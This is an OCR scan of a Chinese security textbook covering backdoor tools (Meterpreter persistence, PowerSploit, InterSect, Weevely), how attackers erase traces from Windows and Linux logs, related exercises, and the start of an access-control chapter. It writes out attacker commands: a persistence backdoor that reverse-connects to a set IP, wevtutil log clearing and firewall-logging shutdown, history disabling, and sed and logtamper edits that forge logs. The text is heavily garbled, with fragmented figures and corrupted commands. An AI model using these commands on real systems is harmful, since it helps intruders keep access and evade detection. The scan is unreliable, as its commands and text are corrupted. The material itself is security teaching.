例 了 如 何 使 用 该 工具 的 3. 0. 5 版 本 来 完成 Linux 中 netstat 程序 的 蔡 换 , 当 netstatl 程序 
蔡 换 掉 原始 的 /bin/netstat 程序 时 ,就 生成 了 一 个 系统 程序 后 门 , 每 次 执行 “/bin/netstat” 
时 , 它 都 会 主动 去 连接 192. 168. 24. 200 的 2002 端口 。 

防御 这 类 后 门 的 方式 主要 有 两 种 。 

(1) 散 列 值 匹 配 。 预 先生 成 原始 程序 的 散 列 值 , 并 不 定期 对 当前 系统 中 所 有 系统 级 
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图 6-17 ”backdoor_factory 的 示例 


程序 重新 生成 散 列 值 ,检测 其 是 否 被 修改 。 
(2) 使 用 反 病 毒 软件 定期 对 系统 程序 进行 扫描 ,检测 是 否 存在 拥 绑 程序 。 


6.1.8 后 门 工具 


本 节 介 绍 几 个 KALI Linux 中 收集 的 常见 后 门 工 具 ,包括 Metasploit 平台 的 
Meterpreter 交互 式 后 门 模块 .基于 PowerShell 的 PowerSpoit 和 Nishang 模块 .基于 
Python 语言 的 后 门生 成 工具 Intersect 和 基于 PHP 语言 的 Web 后 门 Weevely。 

1. Meterpreter 
它 是 Metasploit 框架 的 功能 强大 的 后 渗透 模块 , 当 攻 击 者 攻击 成 功 后 ,需要 设置 后 门 
或 者 进行 远程 控制 时 ,使 用 Meterpreter 是 最 佳 方案 。 攻 击 者 可 以 通过 Meterpreter 的 客 
户 端 执行 攻击 脚本 ,远程 调用 目标 主机 上 运行 的 Meterpreter 服务 端 。 它 的 功能 十 分 强 
大 ,包含 大 部 分 常见 的 远程 控制 功能 ,常用 命令 参数 如 表 6-1 所 列 , 图 6-18 示例 如 何 生成 
和 使 用 Meterpreter 后 门 程序 

表 6-1 Meterpreter 常用 命令 参数 




















命令 作 用 
sessions 查看 回话 ID 信息 
idletime 显示 目标 机 器 截至 当前 无 操作 命令 的 时 间 
webcam_snap 抓 取 目 标 主机 的 摄像 头 拍 摄 的 内 容 并 保留 到 本 地 
run checkvm 检查 目标 主机 是 虚拟 机 还 是 真正 的 机 器 





执行 rdesktop -u username -p password ip 执行 命令 之 后 就 会 弹出 一 











eo 个 窗口 ,并 对 目标 机 器 直接 进行 控制 
hashdump 获得 密码 Hash 值 

keylogrecorder 记录 键盘 信息 

wit 打开 远程 目标 桌面 





getsystem 目标 系统 权限 提升 
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Meterpreter 相当 于 攻击 成 功 后 驻 留 在 内 存 中 的 Shellcode, 为 了 保持 长 久 控制 ， 
Metasploit 提供 了 persistence 和 metsvc 模块 ,用 于 在 Windows 目标 上 安装 开机 运行 或 
永久 服务 等 后 门 ,命令 如 下 : 

// 在 注册 表 中 登记 开机 启动 项 , 反 向 连接 192.168.2. 101 的 2000 端口 

// -X 表 示 为 开机 自 启动 , -指定 反 向 连接 间隔 

meterpreter > run persistence -X -i5 -p2000 —r 192.168.2.101 

// 安 装 系统 服务 metsv 

meterpreter > run metsvc 

但 是 Meterpreter 使 用 的 这 两 种 技术 相对 比较 简单 ,一 般 无 法 避 过 安全 软件 的 检查 。 

2. PowerSpoit 

PowerSpoit 是 基于 PowerShell 的 后 门 集成 框架 (NiShang 与 之 类 似 )。PowerShell 
是 Windows 上 实现 系统 和 应 用 程序 管理 自动 化 的 命令 行 脚 本 环境 ,可 以 把 它 看 成 是 
cmd. exe 的 扩充 ,需要 . NET 环境 的 支持 。 其 主要 模块 包括 : 

(1) CodeExecution: 在 目标 主机 执行 代码 。 

(2) ScriptModification: 在 目标 主机 上 创建 或 修改 脚本 。 

(3) Persistence: 设置 后 门 ,开机 启动 或 安装 服务 等 。 

(4) AntivirusBypass: 绕 过 杀毒 软件 。 

(5) Exfiltration: 在 目标 主机 进行 信息 搜集 的 工具 。 

(6) Mayhem: 蓝屏 等 破坏 性 脚本 。 

(7) Recon: 以 目标 主机 为 跳板 进行 内 网 信息 侦查 。 

3. InterSect 

InterSect@ 是 一 款 攻击 成 功 后 完成 多 种 后 期 任务 的 Python 程序 , 它 能 够 自动 收集 密 
码 文件 和 网 络 信息 ,并 能 识别 杀毒 软件 和 防火 墙 程序 。 若 要 使 它 自动 执行 后 期 任务 ,需要 
创建 自己 的 脚本 文件 ,并 在 脚本 中 指定 所 需 的 各 种 功能 , InterSect 为 每 种 功能 提供 对 应 
的 模块 。 其 包含 的 功能 模块 包括 : 

(1) creds: 收集 认证 信息 。 

(2) extras: 搜索 操作 系统 和 应 用 程序 的 配置 文件 ,以 检索 特定 的 应 用 程序 和 防护 
程序 。 

(3) network: 收集 网 络 信息 ,例如 服务 端口 和 DNS 信息 。 

(4) lanmap: 枚 举 在 线 主 机 并 收集 IP 地址 。 

(5) osuser: 枚 举 操 作 系统 信息 。 

(6) openshares: 在 特定 主机 上 查找 SMB 的 公开 共享 。 

(7) portscan: 简易 的 端口 扫描 程序 ,可 扫描 特定 IP 的 1 一 1000 端口 。 

(8) egressbuster: 在 指定 的 端口 范围 内 ,搜索 可 用 的 外 联 端 口 。 

(9) privsec: 检测 Linux 内 核 的 系统 是 否 存 在 可 提 权 的 漏洞 。 


DD https://www. secpulse. com/archives/55893. html。 
©® https://jobrest. gitbooks. io/kali-linux-cn/content/table_of_contents. html。 
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(10) xmlcrack: 将 哈 希 列表 发 送 端 远程 XMLRPC ,以 继续 破解 。 

(11) reversexor: 采用 XOR 加 密 的 reverse shell。 

(12) bshell: 基于 TCP 协议 的 bind shell。 

(13) rshell: 基于 TCP 协议 的 reverse shell 。 

(14) xorshell: 采用 XOR 加 密 的 bind shell。 

(15) aeshttp: 采用 AES 算法 加 密 的 HTTP Reverse shell。 

(16) udpbind: 基于 UDP 协议 的 bindshell ,默认 端口 21541 。 

(17) persistent: 会 在 系统 启动 时 自动 运行 的 持久 型 后 门 。 

使 用 InterSect 组 合 不 同 功能 产生 后 门 脚本 时 ,首先 选 定 某 个 shell 模块 并 设置 参数 ， 
选择 persistent 模块 设置 开机 启动 运 大 后 选择 其 他 功能 模块 并 设置 参数 ,最 后 保存 为 
后 门 脚本 ,如 图 6-19 所 示 。 首 先 创 建 定 制 脚 本 ,然后 设置 模块 rshell 和 persistent, 最 后 
配置 有 关 参 数 , 生 成 了 后 门 test125. py。 图 6-20 示例 两 个 模块 的 运行 情况 ,persistent 模 
块 在 Linux 系统 中 增加 一 个 启动 脚本 /etc/default/sysupd,rshell 模块 可 以 直接 与 netcat 
程序 连接 生成 一 个 反弹 的 InterSect shell。 

















国 


6-19 ”InterSect 生成 Python 后 门 示例 


4. Weevely 
Weevely? 是 一 款 功能 强大 的 PHP 后 门 工具 , 它 使 用 HTTP 协议 包头 部 进行 指令 传 
输 。 它 的 使 用 也 非常 简单 (图 6-21) ,唯一 的 缺陷 就 是 只 支持 PHP 语言 。 











四 http://www. freebuf. com/sectool/130526. html。 
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图 6-20 ”InterSect 模块 运行 示例 





图 6-21 Weevely 后 让 


使 用 示例 


6.2 痕迹 清除 


当 攻 击 者 成 功 进入 目标 系统 时 ,不 论 他 采取 人 


作 系 统 或 者 网 络 服务 程序 分 别 会 在 日 志 中 忠实 记 


行 查看 这 些 日 志 , 则 很 容易 发 现 系 





种 方式 进入 或 者 实施 哪些 攻击 操作 , 操 
录 相 应 的 事件 。 如 果 安 全 人 员 每 天 都 例 


被 攻击 或 入 侵 。 因 此 攻击 者 必须 清楚 地 了 解 他 的 每 





个 动作 会 在 系统 中 留 下 什么 样 的 记录 ,并且 使 用 相 
且 不 会 被 安全 人 员 察觉 。 


6.2.1 Windows 痕迹 


应 的 工具 或 脚本 将 记录 从 日 志 中 清除 ， 





攻击 Windows 7 系统 可 能 留 下 的 痕迹 主要 包括 : 


(1) 事件 查看 器 记录 的 管理 事件 日 志 、 系 统 
志 、 应 用 程序 和 服务 日 志 。 

(2) 如 果 利 用 HTTP 协议 进行 攻击 或 者 后 门 
器 上 留 下 相应 的 访问 和 使 用 记录 。 


志 、 安 全 日 志 、Setup 日 志 、 应 用 程序 日 


设置 , 则 可 能 在 浏览 器 或 者 Web 服务 
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(3) 相应 的 系统 使 用 痕迹 。 

1. 事件 查看 器 

Windows 7 系统 中 的 事件 查看 器 名 称 是 “eventvwr. msc”, 对 应 的 命令 行 设 置 工具 为 
“wevtutil”( 图 6-22) ,攻击 者 可 以 在 后 台 使 用 wevtutil 清除 某 类 日 志 或 者 改变 该 类 日 志 
的 配置 ,达到 隐蔽 自己 的 目的 。 攻 击 者 无 法 具体 清除 某 条 日 志 , 要 么 该 类 日 志 全 部 被 清 
除 ,要 么 一 条 也 无 法 清除 ; ete ne rs 另 察 觉 , 但 是 他 无 法 查看 
具体 的 攻击 痕迹 。 以 “应 用 程序 ”日志 为 例 ,清除 该 类 日 志 的 命令 行 是 ”wevtutil cl 
Application”。 也 可 以 通过 修改 日 志 的 配置 ,或 者 禁止 某 类 日 志 记录 具体 事件 ,或 者 设置 

志 记 录 的 最 大 容量 ,并 且 当 记录 的 日 志 数 超出 该 容量 时 ,不 再 记录 新 的 日 志 , 从 而 间接 

实现 日 志清 除 的 目的 。 例 如 ,关闭 防火 墙 的 日 志 记录 的 命令 9 是 









wevtutil sl "Microsoft - Windows — Windows Firewall With Advanced Security/Firewall"/e:false" 


图 事件 三 看 器 

文件 (有 ]。 既 作 (A) ”查看 (V) 本 名 (H) 

加 中 | 帮 国 | 日 国 

ri : 


< 本 白 定义 珊 图 





+ 且 应 用 避 序 和 腿 务 日 二 





loge and publishere, inetall 
re lear logs 


T [ARGUMENT] -- -1 [/OPTION:UALUE C/OPIION:UALUE] ... 


(b) 


图 6-22 事件 查看 器 和 命令 行 配置 


@ 不 是 所 有 日 志 都 允许 被 关闭 。 
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命令 “wevtutil sl Security /ms:1028 /rt:true” 把 安全 日 志 最 大 设 为 1028K 字 节 , 当 
日 志 总 量 超出 时 ,新 的 日 志 不 再 被 记录 ,需要 管理 员 手 动 清 除 日 志 后 , 才 会 记录 新 的 事件 
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图 6-23 安全 日 志 配置 最 大 容量 示例 


2. 浏览 器 痕迹 

I 浏览 器 访问 痕迹 的 默认 存放 目录 是 “C:\ Users\ 用 户 名 \ AppData\ Local\ 
Microsoft\Windows\Temporary Internet Files”, 该 目录 默认 具有 隐藏 属性 。 痕 迹 包括 下 
载 的 临时 文件 、 网 站 Cookies 浏览 历史 记录 、 表 单数 据 和 存储 的 登录 密码 。 可 以 有 两 种 
命令 行 方式 清除 这 些 痕 迹 ,一 是 直接 命令 行 删除 痕迹 存放 目录 下 的 相应 文件 ,二 是 使 用 
IE 浏览 器 的 配置 程序 InetCPL. cpl 进行 不 同类 别 的 清除 ,命令 行 如 下 : 

RunD1132. exe InetCpl. cpl, ClearMyTracksByProcess 8 // 清 除 Internet 临时 文件 

RunD1132. exe InetCpl. cpl, ClearMyTracksByProcess 2 // 清 除 Cookies 

RunD1132. exe InetCpl. cpl, ClearMyTracksByProcess 1 // 清 除 历 史记 录 

RunD1132. exe InetCpl. cpl, ClearMyTracksByProcess 16 ”// 清 除 表单 数据 

RunD1132. exe InetCpl. cpl, ClearMyTracksByProcess 32 ”// 清 除 密码 

RunD1132. exe InetCpl. cpl, ClearMyTracksByProcess 255 // 清 除 全 部 项 目 

谷歌 公司 的 Chrome 浏览 器 痕迹 存放 目录 位 于 “% userprofile%\AppData\Local\ 
Google\Chrome\"User Data"\Default\Cache”( 图 6-24) , 它 的 痕迹 清理 有 两 种 方式 ,一 是 
通过 浏览 器 界面 进行 单项 清理 ,二 是 使 用 命令 “del * . * /f /q” 直 接 删除 该 目录 下 所 有 文 
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图 6-24 ”Chrome 浏览 器 痕迹 存放 位 置 和 配置 方式 
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件 。 在 Default 目录 下 还 有 一 些 其 他 与 痕迹 有 关 的 目录 和 文件 ,如 Local Storage、Session 
Storage、GPUCache 目录 和 Cookies 文件 。 

3. Web 服务 器 痕迹 

IIS 的 日 志 存放 目录 位 置 默认 存放 在 系统 目录 的 LogFiles 目录 下 ,按照 不 同日 志 ? 
划 有 相应 的 命名 方式 ,例如 设置 为 每 天 一 份 日 志 
文件 , 则 2017 年 5 月 31 日 的 日 志文 件 为 
“W3SVCex170531. log”( 图 6-25) 。Apache 服务 
器 有 两 个 日 志文 件 , 即 访问 日 志和 错误 日 志 ， 
们 默认 存放 在 安装 目录 的 logs 子 目录 下 ,文件 名 





为 “access. log” 和 “error. log”, 也 可 以 在 httpd i 

. conf 文件 中 进行 配置 ,找到 如 下 两 行进 行 修改 : 【下 ~ 
ErrorLog logs/error. log BT 
CustomLog logs/access. 1og 
Web 服务 器 的 日 志 都 是 文本 文件 ,可 以 对 具 

体 与 攻击 有 关 的 日 志 条 目 进行 针对 性 修改 和 删 图 6-25 IIS 日 志 位 置 

除 ,而 不 改变 其 他 正常 访问 日 志 , 从 而 清除 攻击 痕迹 。 
4. 系统 使 用 痕迹 


使 用 Windows 系统 会 留 下 较 多 痕迹 ,以 360 公司 的 安全 卫士 为 例 , 它 可 以 清理 的 系 
统 痕迹 有 多 达 22 大 类 (图 6-26) ,它们 大 部 分 存储 在 注册 表 中 ,清除 痕迹 即 为 删除 相应 注 
册 表 项 或 键 值 。 例 如 “最 近 使 用 的 文件 列表 ”存放 在 “HKEY_CURRENT_USER\ 
Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs” 表 项 下 ,只 需要 使 
用 “reg delete”" 命 令 删除 相应 键 值 即 可 删除 某 份 * 最 近 使 用 的 文件 ,从 而 隐藏 有 关 痕 迹 。 
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图 6-26 ”360 安全 卫士 清除 系统 痕迹 示例 
6.2.2 Linux 痕迹 
Linux 下 的 大 多 数 日 志文 件 是 以 文本 方式 或 者 以 简单 的 结构 体 方式 存 和 文件 ,因此 
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可 以 针对 不 同 的 日 志 格式 编写 相应 的 痕迹 清除 工具 。 本 节 主 要 介绍 几 种 系统 使 用 痕迹 和 
Web 应 用 痕迹 的 清除 。 

1. 系统 使 用 痕迹 

Linux 系统 会 记录 使 用 痕迹 的 日 志 包 括 lastlog、utmp、wtmp、messages、syslog, 不 同 
系统 日 志 存 放 位 置 可 能 不 同 ,通常 各 类 日 志文 件 存放 位 置 如 下 : 

(1) /var/log/messages: 每 一 行 包 含 日 期 .主机 名 、 程 序 名 ,接着 是 PID 或 内 核 标识 ， 
最 后 是 消息 。 

(2) /var/log/wtmp: 永久 记录 每 个 用 户 登 录 、 注 销 及 系统 的 启动 和 关机 事件 ,用 来 
查看 用 户 的 登录 记录 ,last 命令 通过 访问 这 个 文件 获得 信息 。 

(3) /var/run/utmp: 记录 有 关 当 前 登录 的 每 个 用 户 的 信息 ,文件 内 容 随 着 用 户 登 录 
和 注销 系统 而 不 断 变化 , 它 只 保留 联机 用 户 的 记录 ,不 会 保留 永久 记录 ,系统 程序 如 who、 
w、users,finger 等 就 需要 访问 这 个 文件 。 

(4) /var/log/lastlog: 记录 最 近 几 次 成 功 登 录 的 事件 和 最 后 一 次 不 成 功 的 登录 
事件 。 

(5) /var/log/syslog: 记录 所 有 的 系统 事件 。 

攻击 者 可 以 暴力 使 用 shred 或 rm 命令 直接 删除 日 志文 件 ,但 是 这 相当 于 告诉 管理 员 
系统 已 经 被 人 侵 , 通 常 只 修改 日 志文 件 而 不 是 进行 删除 。 攻 击 者 可 以 有 三 种 方法 清除 日 
志 中 的 痕迹 : 

(1) 直接 手动 修改 文本 文件 ,删除 与 自身 有 关 的 记录 ,然后 使 用 touch 命令 修改 日 志 
文件 的 访问 时 间 和 修改 时 间 。 

(2) 自行 编写 shell 脚本 (sed 命令 等 ) 或 程序 针对 特定 需求 对 日 志 进 行 修改 。 

(3) 利用 第 三 方 日 志清 除 和 修改 工具 。 

Logtamperg 是 一 款 修改 Linux 日 志 的 工具 ,在 修改 日 志文 件 的 同时 能 够 保留 被 修 
改 文件 的 时 间 信 息 。 用 于 修改 utmp、wtmp 和 lastlog 日 志文 件 , 主 要 功能 如 下 : 

logtamper [ - f utmp_filename] 一 h username hostname  ”// 清 除 攻 击 者 当前 登录 信息 

logtamper [ - f wtmp_filename] - w username hostname  ”// 清 除 攻击 者 登录 历史 信息 

logtamper [ 一 f lastlog filename] 一 m username hostname ttyname YYYY[ :MM[ :DD[ :hh[ :mm[ :ss]]]]] 

// 修 改 攻击 者 登录 的 具体 时 间 

wtmpclean® 是 一 款 用 来 显示 和 清除 系统 中 wtmp 日 志 记 录 的 工具 ,其 主要 用 法 如 
图 6-27 所 示 。 

另外 ,Linux 下 大 多 数 的 shell 采用 bash 或 者 其 他 shell, 通 过 输入 输出 重 定向 与 服务 
器 进行 交互 ,攻击 者 使 用 ssh 或 者 telnet 等 客户 端 登录 时 ,所 有 的 操作 命令 都 会 记录 在 
shell 的 相应 历史 (history) 文 件 中 ,例如 bash 会 在 用 户主 目录 的 “. bash_history” 文 件 里 
记录 所 有 操作 的 命令 。 因 此 ,进入 系统 时 首先 要 禁止 Linux 记录 这 些 操作 ,可 以 使 用 
unset 命令 清除 相应 的 环境 变量 ,如 下 所 示 ( 以 bash 为 例 ) : 





DD http://www.myhack58. com/Article/48/66/2014/50509. htm。 
©® https://github. com/madrisan/wtmpclean. 
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wtmpclean 


A tool for dumping wtmp files and patching wtmp records. 


Usage 
wtmpclean [-1|-r] [-t “YYYY.M4.00 hH:m:ss"] [-f <wtmpfile>] <user> [<fake>] 


here 


。 -f, -file Modify instead of /var/log/wtmp 

® -|, --list Show listing of logins 

® -1, --raw Show the raw content of the wtmp database 
®t, -time Delete the login at the specified time 


[Examples 


wtmpclean --raw -ff /var/log/wtmp.1 root 
wtmpclean -t "2008.09.06 14:30:00" jekyll hide 
wtmpclean -t “2013\.12\.2? Ee 

wtmpclean -f /var/log/wtmp.1 jekyll 














图 6-27 wtmpclean 用 法 示例 


unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; 。”// 清 除 有 关 环 境 变 量 


export HISTFILE = /dev/nul1l; // 将 历史 文件 变量 设置 为 nu11 
export HISTSIZE = 0; // 将 历史 大 小 设置 为 0 
export HISTFILESIZE = 0 // 设 置 历史 文件 大 小 为 0 


攻击 者 也 可 以 在 较 深 的 目录 中 建立 隐藏 目录 , 取 名 为 “. ”“..” 和 ” "之 类 名 字 , 然 后 把 
入 侵 工具 和 文件 放 进去 ,还 可 以 使 用 各 种 Rootkits 来 帮助 完成 隐藏 文件 。 但 是 相应 地 ， 
安全 人 员 可 以 使 用 find 命令 根据 特定 规则 找 出 隐藏 目录 ,使 用 chkrootkit? 工具 检测 系 
统 中 是 否 有 Rootkits ,使 用 tripwire@ 等 完整 性 检测 工具 检测 是 否 有 系统 文件 被 修改 或 访 
问 过 。 

2. 应 用 痕迹 

应 用 痕迹 主要 包括 Apache、MySQL 和 PHP 服务 程序 记录 的 访问 日 志 。Apache 主 
要 的 日 志 是 access. log 和 error_log, 前 者 记录 HTTP 访问 记录 ,后 者 记录 服务 器 的 错误 日 
志 , 它 们 都 是 文本 文件 ,可 以 编写 sd 和 grep 命令 脚本 对 其 中 的 记录 进行 修改 或 者 删除 , 例 
如 以 下 命令 可 将 访问 日 志 中 出 现 的 人 地址 192. 168. 24. 200 全 部 替换 为 202. 101. 1. 10: 


sed - i 's/192\.168\.24\.200/202\.101\.1\.10/g' /var/log/apache/ access. 1og 


MySQL 数据 库 的 服务 器 日 志 位 置 可 以 在 /etc/my. cnf 文件 中 找到 ,二 进 制 日 志文 件 
需要 使 用 mysql client 进行 修改 和 删除 ,文本 文件 可 以 使 用 sed 修改 ,主要 包括 : 


log— error = /var/log/mysql/mysql_error. log // 错 误 日 志 
1og = /var/log/mysql/mysql. 1og // 包 括 每 一 个 执行 的 sql 及 环境 
// 变 量 的 改变 等 


® http://www.chkrootkit. org/ 。 


回 http://www. tripwire. com。 
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log- bin= /var/log/mysql/mysql_bin. log // 用 于 备份 恢复 ,或 主 从 复制 
log- slow— queries = /var/log/mysql/mysql_slow. log // 慢 查询 日 志 


在 PHP5 中 ,可 在 php. ini 内 找到 错误 日 志文 件 位 置 : 


log errors = On 
error_1og = /var/log/apache/php_error. log 


6.3 小 结 


网 络 后 门 的 设置 方式 多 种 多 样 ,包括 设置 连接 端口 ,修改 系统 配置 ,建立 隐蔽 连接 通 
道 、 创 建 用 户 账 户 、 安 装 远程 控制 工具 、 蔡 换 系统 文件 等 。 设 置 连接 端口 工具 有 netcat、 
socat、msfvenom 等 ,也 可 以 开启 系统 服务 程序 打开 默认 端口 。 修 改 系统 配置 一 是 用 于 增 
加 开机 启动 项 ,使 得 后 门 永久 生效 ; 二 是 修改 安全 配置 ,使 得 安全 软件 无 法 发 现 后 门 运 
行 , 如 修改 防火 墙 配置 和 操作 系统 安全 审核 配置 。 隐 项 连接 主要 是 为 了 躲避 安全 人 员 的 
人 工 审核 或 IPS 检测 ,将 自己 伪装 在 正常 的 网 络 访问 报 文中 。 创 建 管理 员 用 户 相当 于 超 
级 后 门 , 但 是 容易 被 发 现 。 远 程控 制 工 具 也 是 后 门 的 一 种 ,但 是 它 的 功能 远大 于 普通 后 
门 。 替 换 系 统 文件 是 一 种 流行 的 后 门 设置 方式 ,后 门 设置 工具 有 msfvenom 和 backdoor_ 
factory, 这 类 后 门 可 以 使 用 完整 性 检测 工具 识别 。 

KALI Linux 中 收集 了 一 些 专门 用 于 制作 后 门 的 工具 集 , 包 括 Meterpreter、 
PowerSpoit InterSect 和 Weevely。 

痕迹 清除 是 攻击 过 程 的 最 后 一 个 步骤 ,用 于 清除 所 有 的 操作 记录 。Windows 工具 
wevtutil 可 以 修改 或 关闭 事件 日 志和 安全 审核 日 志 。 本 章 还 介绍 了 IIS 服务 器 和 Web 浏 
览 器 的 访问 痕迹 位 置 和 清除 方式 ,介绍 了 Linux 系统 访问 日 志和 Web 应 用 日 志 的 位 置 和 
清除 方式 ,wtmpclean 和 Logstamper 是 两 个 较为 有 用 的 日 志清 除 工 具 。 


习 题 


6-1 使 用 Netcat 在 Windows 系统 开启 连接 端口 80, 在 Linux 下 访问 该 系统 ,并 获 
得 远程 cmd shell 。 

6-2 在 注册 表 中 增加 一 项 开机 启动 项 .重新 启动 机 器 ,查看 指定 程序 是 否 开机 自 
启动 。 
6-3 ”练习 使 用 netsh advfirewall firewall 修改 防火 墙 配置 ,使 系统 允许 指定 程序 的 
所 有 报 文通 过 。 

6-4 在 Windows7 和 Linux 下 分 别 在 命令 行 创 建 管理 员 用 户 ,查看 系统 如 何 记 录 此 
类 事件 ,思考 如 何 清除 或 阻止 产生 此 类 痕迹 。 

6-5 ”练习 使 用 msfvenom 替换 Windows 系统 文件 ,并 检测 是 否 生 效 。 

6-6 ”练习 应 用 Meterpreter 模块 ,并 应 用 其 persistent 子 模块 与 攻击 者 建立 反 向 
连接 。 
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6-7 利用 InterSect 自行 组 装 一 个 Python 后 门 , 放 到 Windows 或 Linux 系统 运行 ， 
检测 后 门 的 效果 。 

6-8 应 用 wevtutil 打开 、 关 闭 \、 设 置 某 项 日 志 的 最 大 容量 。 

6-9 清除 你 所 使 用 的 下 浏览 器 和 Chrome 浏览 器 的 上 网 痕迹 。 

6-10 练习 使 用 Logstamper 修改 wtmp、utmp 和 lastlog 文件 ,并 确认 日 志 修 改 
效果 。 





访问 控制 与 防火 墙 


学 习 要 求 : 

。 理解 各 种 访问 控制 方法 的 基本 原理 。 

。 掌握 包 过 滤 防 火 墙 技术 的 基本 原理 ,理解 常见 的 防火 墙 体系 结构 。 
。 了 解 代理 防 火 墙 技术 原理 和 防火 墙 的 优 缺点 。 

。 熟练 掌握 Windows 个 人 防火 墙 的 基本 原理 和 设置 方法 。 

。 熟练 掌握 Linux iptables 防火 墙 的 基本 原理 和 设置 方法 。 
熟练 掌握 Cisco ACL 的 基本 原理 和 设置 方法 。 

掌握 CCProxy 代理 防火 墙 的 基本 原理 和 设置 方法 。 


在 网 络 安全 环境 中 ,访问 控制 用 于 限制 通过 通信 和 链 路 对 系统 和 应 用 的 访问 , 它 在 身份 
识别 的 基础 上 ,对 用 户 提出 的 资源 访问 请 求 加 以 控制 ,防止 未 授权 用 户 非法 使 用 系统 资 
源 。 访 问 控制 包括 用 户 身份 认证 和 用 户 权 限 确认 。 

防火 墙 是 一 种 综合 性 技术 ,用 于 加 强 网 络 间 的 访问 控制 ,防止 外 部 用 户 非 法 使 用 内 部 
资源 ,保护 内 部 网 络 设备 不 被 破坏 ,防止 敏感 数据 失窃 。 它 在 网 络 边界 构造 一 个 保护 层 ， 
强制 所 有 的 访问 和 连接 都 经 过 该 层 ,并 在 此 进行 检查 和 连接 ,只 有 授权 通信 才能 通过 。 防 
火 墙 的 实现 技术 主要 包括 包 过 滤 防 火 增 和 代理 防火 墙 。 


7.1 访问 控制 


访问 控制 技术 是 ISO 在 网 络 安全 体系 中 定义 的 五 大 安全 服务 功能 之 一 , 它 控制 只 有 
授权 用 户 才 有 资格 访问 有 关 资 源 。 通 过 访问 控制 隔离 用 户 对 资源 的 直接 访问 ,使 得 用 户 
对 资源 的 任何 操作 都 处 于 监视 和 控制 之 下 ,从 而 保证 资源 的 合法 使 用 。 

访问 控制 系统 一 般 包括 以 下 儿 个 实体 。 

(1) 主体 : 发 出 访问 指令 和 存 取 要 求 的 主动 方 ,通常 指 用 户 或 用 户 的 某 个 进程 。 

(2) 客体 : 被 访问 的 对 象 ,可 以 是 被 调用 的 程序 和 进程 、 存 取 的 信息 和 数据 、 被 访问 
的 文件 、 系 统 或 各 种 网 络 设备 等 资源 。 

(3) 访问 : 对 资源 的 各 种 类 型 的 操作 ,包括 读 、 写 、 修 改 和 删除 等 。 

(4) 安全 策略 : 主体 对 客体 的 访问 规则 集合 , 它 体 现 了 一 种 授权 行为 , 即 客体 对 主体 
的 权限 许可 不 能 超过 规则 集合 。 

访问 控制 的 安全 策略 主要 有 两 种 实现 方法 : 基于 身份 的 安全 策略 和 基于 规则 的 安 
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全 策略 。 基 于 身份 的 安全 策略 是 指 只 有 通过 认证 的 主体 才能 正常 使 用 客体 的 资源 , 它 
包括 基于 个 人 的 策略 和 基于 组 的 策略 。 基 于 规则 的 安全 策略 指 对 客体 标注 安全 标记 ， 
当主 体 访 问 时 ,由 系统 比较 主体 的 安全 标记 和 客体 的 安全 标记 来 判断 是 否 允 许 主体 
访问 。 

安全 策略 的 实施 原则 主要 有 三 点 。 

(1) 最 小 权限 原则 : 主体 执行 操作 时 , 仅 分 配 完成 操作 所 需要 的 最 小 权限 。 

(2) 最 小 泄露 原则 : 主体 执行 操作 时 ,按照 所 需 知道 的 信息 最 小 化 原则 ,分 配 权限 。 

(3) 多 级 安全 策略 : 数据 流向 和 权限 控制 按照 安全 级 别 进行 划分 ,只 有 主体 的 安全 
级 别 高 于 客体 ,主体 才 可 以 访问 客体 ,避免 信息 扩散 。 

访问 控制 模型 是 从 访问 控制 的 角度 出 发 ,描述 安全 系统 、 建 立 安全 模型 的 一 种 方法 ， 
常见 的 访问 控制 模型 包括 自主 访问 控制 .强制 访问 控制 和 角色 访问 控制 等 。 访 问 控制 系 
统 的 实现 方法 主要 有 访问 控制 矩阵 ,访问 控制 列表 、 访 问 能 力 表 和 授权 关系 表 等 。 


7.1.1 实现 方法 


1. 访问 控制 矩阵 

从 数学 角度 看 ,访问 控制 可 以 自然 地 表示 为 矩阵 形式 ,每 一 行 表 示 一 个 客体 ,每 一 列 
表示 一 个 主体 ,矩阵 的 元 素 表示 访问 权限 。 表 7-1 列 出 了 一 个 简单 的 例子 ,Ul1、U2 和 U3 
是 三 个 主体 ,客体 为 2 个 文件 (Filel 和 File2) 和 2 个 目录 (Dirl 和 Dir2)。Ul 是 Filel 和 
Dirl 的 拥有 者 , 它 将 Filel 的 读 权限 (r) 授 予 U2 和 U3 ,而 将 Filel 的 写 权 限 仅 授予 U3, 仅 
将 Dirl 的 写 权 限 授予 U2,Ul 没有 File2 和 Dir2 的 任何 访问 权限 。 


表 7-1 访问 控制 矩阵 示例 











Filel File2 Dirl Dir2 
Ul OwnyTywW Ownyry w 
U2 r Ownsry w w 区 
U3 rw Ownyry wW 














访问 控制 矩阵 具有 简单 直观 的 优点 ,主要 用 于 实现 自主 访问 控制 模型 。 由 于 实际 的 
信息 系统 中 ,许多 主体 和 客体 之 间 并 无 联系 ,因此 矩阵 中 会 出 现 很 多 空白 。 

2. 访问 控制 列表 

访问 控制 列表 (Access Control List,ACL) 是 采用 最 多 的 一 种 访问 控制 实现 方式 , 它 
可 以 对 某 个 特定 客体 指定 任意 主体 的 访问 权限 ,也 可 以 将 相同 权限 的 客体 分 组 ,以 组 为 单 
位 授予 权限 。 它 从 客体 角度 进行 设置 ,每 个 客体 有 一 张 表 ,用 于 说 明 有 权 访 问 该 客体 的 所 
有 主体 及 访问 权限 。ACL 可 以 看 作 通过 提取 访问 控制 矩阵 中 的 列 信息 而 生成 , 它 是 客体 
的 属性 表 ,指定 每 个 主体 对 它 的 访问 权限 ,图 7-1 的 ACL 对 应 表 7-1 的 访问 控制 矩阵 ,对 
于 Filel ,U1l 是 拥有 者 并 且 有 读 写 权 限 ,U2 有 读 权 限 ,U3 有 读 写 权限 。 

ACL 的 优点 在 于 直观 易 懂 ,但 是 当 客体 较 多 时 ,需要 在 ACL 中 设 定 大 量 的 表 项 , 当 
某 个 主体 的 权限 发 生变 化 时 ,可 能 会 更 改 多 个 客体 的 属性 表 , 这 使 得 访问 控制 列表 的 配置 
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图 7-1 访问 控制 列表 (ACL) 示 例 


变 得 十 分 费劲 ,而 且 容 易 出 错 。 目 前 ,ACL 通常 用 于 路 由 器 接口 ,用 于 帮助 路 由 器 判定 哪 
些 报 文 应 该 接收 ,哪些 应 该 丢弃 。Linux 中 的 文件 和 目录 的 权限 位 表示 属于 ACL 的 一 种 
变形 ,以 文件 和 进程 作为 客体 ,相对 较 易 实 现 。 

3. 访问 能 力 表 

访问 能 力 表 (Access Control Capability List,ACCL) 是 访问 控制 矩阵 的 另 一 种 实现 
